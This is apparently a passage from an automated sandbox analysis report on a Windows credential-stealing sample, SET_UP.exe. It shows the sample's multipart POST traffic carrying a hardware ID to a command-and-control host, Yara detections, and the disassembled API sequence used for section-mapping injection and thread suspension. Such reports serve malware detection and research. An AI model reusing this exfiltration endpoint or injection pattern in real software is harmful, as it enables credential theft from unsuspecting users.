                                                                                                Data Ascii: --8KZNW321KQR41UQContent-Disposition: form-data; name="hwid"322DD9C345B95EE669AE778FE2799D69--8KZNW321KQR41UQContent-Disposition: form-data; name="pid"2--8KZNW321KQR41UQContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--8KZN
                                                                                                2025-01-06 14:15:12 UTC1135INHTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 14:15:12 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=3qi7rr4bg3ddg24s7gn17e6itn; expires=Fri, 02 May 2025 08:01:51 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FVsGiWPzaxZFLh9a2OWC1bADPT2bl7I5fI0O7nB6C%2Bvbnj42x5W7qyAtfOc%2FI2jue0W4DfOBgRzScjxFd8vYprVFQ943Z%2F3oqPJ%2BcOErNXrWTzUb83DSD4VfUZcBysnMRLStgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fdc519d3cf34210-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1764&rtt_var=665&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2842&recv_bytes=9704&delivery_rate=1639528&cwnd=246&unsent_bytes=0&cid=be842c9c4cb7ba94&ts=506&x=0"
                                                                                                2025-01-06 14:15:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2025-01-06 14:15:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.449752188.114.97.34437620C:\Users\user\Desktop\SET_UP.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 14:15:13 UTC283OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=LH89NZCPPT358FSVRS
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 20438
                                                                                                Host: glowscarrytsv.sbs
                                                                                                2025-01-06 14:15:13 UTC15331OUTData Raw: 2d 2d 4c 48 38 39 4e 5a 43 50 50 54 33 35 38 46 53 56 52 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 32 44 44 39 43 33 34 35 42 39 35 45 45 36 36 39 41 45 37 37 38 46 45 32 37 39 39 44 36 39 0d 0a 2d 2d 4c 48 38 39 4e 5a 43 50 50 54 33 35 38 46 53 56 52 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 48 38 39 4e 5a 43 50 50 54 33 35 38 46 53 56 52 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52
                                                                                                Data Ascii: --LH89NZCPPT358FSVRSContent-Disposition: form-data; name="hwid"322DD9C345B95EE669AE778FE2799D69--LH89NZCPPT358FSVRSContent-Disposition: form-data; name="pid"3--LH89NZCPPT358FSVRSContent-Disposition: form-data; name="lid"hRjzG3--ELVIR
                                                                                                2025-01-06 14:15:13 UTC5107OUTData Raw: 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03
                                                                                                Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                2025-01-06 14:15:13 UTC1141INHTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 14:15:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=iebf2r190mqejjponf3sp18gku; expires=Fri, 02 May 2025 08:01:52 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SMO%2FoSr15qpXfSIckGNerTtu9THJsBI%2B8ywdoyoIUMskC9uFP%2B60nnJjk%2F6KpN3N2c9fxgQzpMsOPz7440g5m%2Bb4jHnFYnNhYmiWMraPIdXOd7JciTyNVN0JSJN%2BkW8z4E0E2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fdc51a4fd7e42bd-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=12516&min_rtt=1763&rtt_var=7191&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21401&delivery_rate=1656267&cwnd=196&unsent_bytes=0&cid=10527891c2db3766&ts=609&x=0"
                                                                                                2025-01-06 14:15:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2025-01-06 14:15:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.449753188.114.97.34437620C:\Users\user\Desktop\SET_UP.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 14:15:14 UTC271OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=RAO4YOWP
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 916
                                                                                                Host: glowscarrytsv.sbs
                                                                                                2025-01-06 14:15:14 UTC916OUTData Raw: 2d 2d 52 41 4f 34 59 4f 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 32 44 44 39 43 33 34 35 42 39 35 45 45 36 36 39 41 45 37 37 38 46 45 32 37 39 39 44 36 39 0d 0a 2d 2d 52 41 4f 34 59 4f 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 41 4f 34 59 4f 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 52 41 4f 34 59 4f 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                                Data Ascii: --RAO4YOWPContent-Disposition: form-data; name="hwid"322DD9C345B95EE669AE778FE2799D69--RAO4YOWPContent-Disposition: form-data; name="pid"1--RAO4YOWPContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--RAO4YOWPContent-Disposi
                                                                                                2025-01-06 14:15:15 UTC1128INHTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 14:15:15 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=jt4t5s3h44d84vln13sls7dbcf; expires=Fri, 02 May 2025 08:01:54 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hLCdUlVqJP5vnvlVALpG4Z1N8oFi40YyAmIiXXUHnMwiDwpwx2p4M%2BExExakfAIpizMd04fcqjSEP2u5egvBeRfbF4jMOcNa16Z05vt%2F00fckkBLBIdI5YGWX8V93R634FFIeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fdc51ad5c3ec45c-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1523&rtt_var=610&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1823&delivery_rate=1737061&cwnd=243&unsent_bytes=0&cid=f7ceebefa5552023&ts=823&x=0"
                                                                                                2025-01-06 14:15:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2025-01-06 14:15:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.449754188.114.97.34437620C:\Users\user\Desktop\SET_UP.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 14:15:16 UTC283OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=SZ2TPF9HTZ8ABB2DKFX
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 1112
                                                                                                Host: glowscarrytsv.sbs
                                                                                                2025-01-06 14:15:16 UTC1112OUTData Raw: 2d 2d 53 5a 32 54 50 46 39 48 54 5a 38 41 42 42 32 44 4b 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 32 44 44 39 43 33 34 35 42 39 35 45 45 36 36 39 41 45 37 37 38 46 45 32 37 39 39 44 36 39 0d 0a 2d 2d 53 5a 32 54 50 46 39 48 54 5a 38 41 42 42 32 44 4b 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 5a 32 54 50 46 39 48 54 5a 38 41 42 42 32 44 4b 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c
                                                                                                Data Ascii: --SZ2TPF9HTZ8ABB2DKFXContent-Disposition: form-data; name="hwid"322DD9C345B95EE669AE778FE2799D69--SZ2TPF9HTZ8ABB2DKFXContent-Disposition: form-data; name="pid"1--SZ2TPF9HTZ8ABB2DKFXContent-Disposition: form-data; name="lid"hRjzG3--EL
                                                                                                2025-01-06 14:15:23 UTC1146INHTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 14:15:23 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=smvkms29tbniul0a10qs5beok5; expires=Fri, 02 May 2025 08:02:02 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BCXFis5gsJrT4Een%2BZa%2F6c%2B5KuvbR4DOZuE5fGq%2F3%2BlKinjo4PyiX%2ByJKZyYcAeuniIHwGIad1yZzSKGCeMv%2BFAFhG2ZWUNWPn5MMqR95I9C%2Bfi5x9qymOyUzY2F%2B02271lmSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fdc51b5da164304-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2532&min_rtt=1620&rtt_var=1259&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2031&delivery_rate=1802469&cwnd=248&unsent_bytes=0&cid=6f7ced39e484bc5e&ts=7651&x=0"
                                                                                                2025-01-06 14:15:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2025-01-06 14:15:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:09:14:58
                                                                                                Start date:06/01/2025
                                                                                                Path:C:\Users\user\Desktop\SET_UP.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\SET_UP.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:77'268'426 bytes
                                                                                                MD5 hash:5B0BAFDDDBC54BCBC57B87DFB94D0C64
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1792533320.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1807281482.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1792533320.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.2%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:31.6%
                                                                                                  Total number of Nodes:117
                                                                                                  Total number of Limit Nodes:10
                                                                                                  execution_graph 14212 950409 14213 950417 14212->14213 14228 950d59 14213->14228 14215 9509a2 14216 9505af GetPEB 14218 95062c 14216->14218 14217 95056a 14217->14215 14217->14216 14231 950b19 14218->14231 14221 95068d CreateThread 14223 950665 14221->14223 14243 9509c9 GetPEB 14221->14243 14222 95089d 14226 95098d TerminateProcess 14222->14226 14223->14222 14239 951019 GetPEB 14223->14239 14226->14215 14227 950b19 4 API calls 14227->14222 14241 950d79 GetPEB 14228->14241 14230 950d66 14230->14217 14232 950b2f CreateToolhelp32Snapshot 14231->14232 14234 95065f 14232->14234 14235 950b66 Thread32First 14232->14235 14234->14221 14234->14223 14235->14234 14236 950b8d 14235->14236 14236->14234 14237 950bc4 Wow64SuspendThread 14236->14237 14238 950bee CloseHandle 14236->14238 14237->14238 14238->14236 14240 9506e7 14239->14240 14240->14222 14240->14227 14242 950d94 14241->14242 14242->14230 14244 950a22 14243->14244 14245 950a82 CreateThread 14244->14245 14246 950acf 14244->14246 14245->14244 14247 9511f9 14245->14247 14250 9a2fbe 14247->14250 14251 9a30cd 14250->14251 14252 9a2fe3 14250->14252 14262 9a4299 14251->14262 14286 9a5840 14252->14286 14255 9a2ffb 14256 9a5840 LoadLibraryA 14255->14256 14261 9511fe 14255->14261 14257 9a303d 14256->14257 14258 9a5840 LoadLibraryA 14257->14258 14259 9a3059 14258->14259 14260 9a5840 LoadLibraryA 14259->14260 14260->14261 14263 9a5840 LoadLibraryA 14262->14263 14264 9a42bc 14263->14264 14265 9a5840 LoadLibraryA 14264->14265 14266 9a42d4 14265->14266 14267 9a5840 LoadLibraryA 14266->14267 14268 9a42f2 14267->14268 14269 9a431b 14268->14269 14270 9a4307 VirtualAlloc 14268->14270 14269->14261 14270->14269 14273 9a4335 14270->14273 14271 9a5840 LoadLibraryA 14272 9a43b3 14271->14272 14272->14269 14274 9a4409 14272->14274 14290 9a5647 14272->14290 14273->14271 14284 9a458e 14273->14284 14275 9a5840 LoadLibraryA 14274->14275 14276 9a446b 14274->14276 14274->14284 14275->14274 14276->14284 14285 9a44cd 14276->14285 14318 9a3429 14276->14318 14278 9a464c VirtualFree 14278->14269 14280 9a44b6 14280->14284 14325 9a3524 14280->14325 14283 9a45eb 14283->14283 14284->14278 14284->14283 14285->14284 14294 9a49c9 14285->14294 14287 9a5857 14286->14287 14288 9a587e 14287->14288 14344 9a3945 14287->14344 14288->14255 14292 9a565c 14290->14292 14291 9a56d2 LoadLibraryA 14293 9a56dc 14291->14293 14292->14291 14292->14293 14293->14272 14295 9a4a04 14294->14295 14296 9a4a4b NtCreateSection 14295->14296 14297 9a4a70 14295->14297 14317 9a5078 14295->14317 14296->14297 14296->14317 14298 9a4b05 NtMapViewOfSection 14297->14298 14297->14317 14305 9a4b25 14298->14305 14299 9a4dac 14300 9a4e4e VirtualAlloc 14299->14300 14302 9a5647 LoadLibraryA 14299->14302 14304 9a4e4a 14299->14304 14330 9a56e5 14299->14330 14306 9a4e90 14300->14306 14301 9a5647 LoadLibraryA 14301->14305 14302->14299 14303 9a4f41 VirtualProtect 14307 9a500c VirtualProtect 14303->14307 14311 9a4f61 14303->14311 14304->14300 14305->14299 14305->14301 14308 9a56e5 LoadLibraryA 14305->14308 14305->14317 14306->14303 14314 9a4f2e NtMapViewOfSection 14306->14314 14306->14317 14309 9a503b 14307->14309 14308->14305 14316 9a5186 14309->14316 14309->14317 14334 9a53fa 14309->14334 14311->14307 14315 9a4fe6 VirtualProtect 14311->14315 14312 9a518e CreateThread 14312->14317 14314->14303 14314->14317 14315->14311 14316->14312 14316->14317 14317->14284 14319 9a5647 LoadLibraryA 14318->14319 14320 9a343d 14319->14320 14321 9a56e5 LoadLibraryA 14320->14321 14324 9a3445 14320->14324 14322 9a345d 14321->14322 14323 9a56e5 LoadLibraryA 14322->14323 14322->14324 14323->14324 14324->14280 14326 9a5647 LoadLibraryA 14325->14326 14327 9a353a 14326->14327 14328 9a56e5 LoadLibraryA 14327->14328 14329 9a354a 14328->14329 14329->14285 14331 9a5816 14330->14331 14332 9a5700 14330->14332 14331->14299 14332->14331 14338 9a3aea 14332->14338 14337 9a5422 14334->14337 14335 9a5614 14335->14316 14336 9a56e5 LoadLibraryA 14336->14337 14337->14335 14337->14336 14339 9a3b09 14338->14339 14340 9a3b2f 14338->14340 14339->14340 14342 9a3b3c 14339->14342 14343 9a56e5 LoadLibraryA 14339->14343 14341 9a5647 LoadLibraryA 14340->14341 14340->14342 14341->14342 14342->14331 14343->14339 14346 9a3965 14344->14346 14347 9a3a4a 14344->14347 14345 9a3aea LoadLibraryA 14345->14347 14346->14345 14346->14347 14347->14287

                                                                                                  Executed Functions

                                                                                                  Function 009A49C9 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 009A4A62
                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 009A4B0A
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 009A4E7E
                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 009A4F33
                                                                                                  • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 009A4F50
                                                                                                  • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 009A4FF3
                                                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 009A5026
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 009A5197
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1248616170-0
                                                                                                  • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                  • Instruction ID: 863d92401d8c7df92ead23612ea7201fb27bfa2f71c59a88f93775df3485701e
                                                                                                  • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                  • Instruction Fuzzy Hash: 26428871608701AFDB24CF24C884B6BBBE9EFC9714F15492DF9999B241E7B4E840CB91
                                                                                                  Function 00950B19 Relevance: 6.1, APIs: 4, Instructions: 100threadprocessCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 187 950b19-950b60 CreateToolhelp32Snapshot 190 950c36-950c39 187->190 191 950b66-950b87 Thread32First 187->191 192 950c22-950c31 191->192 193 950b8d-950b93 191->193 192->190 194 950b95-950b9b 193->194 195 950c02-950c1c 193->195 194->195 196 950b9d-950bbc 194->196 195->192 195->193 196->195 199 950bbe-950bc2 196->199 200 950bc4-950bd8 Wow64SuspendThread 199->200 201 950bda-950be9 199->201 202 950bee-950c00 CloseHandle 200->202 201->202 202->195
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,0095065F,?,00000001,?,81EC8B55,000000FF), ref: 00950B57
                                                                                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 00950B83
                                                                                                  • Wow64SuspendThread.KERNEL32(00000000), ref: 00950BD6
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00950C00
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 1849706056-0
                                                                                                  • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                  • Instruction ID: 281dcc8f43aeb97cf232c123d087d4a373b9652c57ae6e38c86df23e9b6a2344
                                                                                                  • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                  • Instruction Fuzzy Hash: 66410C75A00108AFDB18DF99C491BADB7B6EFC8300F10C168EA559B794DA34AE45CB54
                                                                                                  Function 00950409 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 399threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 203 950409-950571 call 9509b9 call 950fb9 call 951169 call 950d59 212 950577-95057e 203->212 213 9509a2-9509a5 203->213 214 950589-95058d 212->214 215 9505af-95062a GetPEB 214->215 216 95058f-9505ad call 950ed9 214->216 217 950635-950639 215->217 216->214 220 950651-950663 call 950b19 217->220 221 95063b-95064f 217->221 226 950665-95068b 220->226 227 95068d-9506ae CreateThread 220->227 221->217 228 9506b1-9506b5 226->228 227->228 229 950976-9509a0 TerminateProcess 228->229 230 9506bb-9506ee call 951019 228->230 229->213 230->229 235 9506f4-950743 230->235 237 95074e-950754 235->237 238 950756-95075c 237->238 239 95079c-9507a0 237->239 242 95076f-950773 238->242 243 95075e-95076d 238->243 240 9507a6-9507b3 239->240 241 95086e-950961 call 950b19 call 9509b9 call 950fb9 239->241 244 9507be-9507c4 240->244 269 950966-950970 241->269 270 950963 241->270 245 950775-950783 242->245 246 95079a 242->246 243->242 248 9507f4-9507f7 244->248 249 9507c6-9507d4 244->249 245->246 250 950785-950797 245->250 246->237 255 9507fa-950801 248->255 253 9507d6-9507e5 249->253 254 9507f2 249->254 250->246 253->254 257 9507e7-9507f0 253->257 254->244 255->241 259 950803-95080c 255->259 257->248 259->241 261 95080e-95081e 259->261 263 950829-950835 261->263 265 950837-950864 263->265 266 950866-95086c 263->266 265->263 266->255 269->229 270->269
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 009506AC
                                                                                                  • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 009509A0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcessTerminateThread
                                                                                                  • String ID: }zk@
                                                                                                  • API String ID: 1197810419-295876903
                                                                                                  • Opcode ID: ccdc78e6cc621a474320049fa84a9fda98614b9e929602b22d865eb6ba0a8ee6
                                                                                                  • Instruction ID: 89765397ac2090202c37c726c5f10cee087fe013b6f297502019481f842e2870
                                                                                                  • Opcode Fuzzy Hash: ccdc78e6cc621a474320049fa84a9fda98614b9e929602b22d865eb6ba0a8ee6
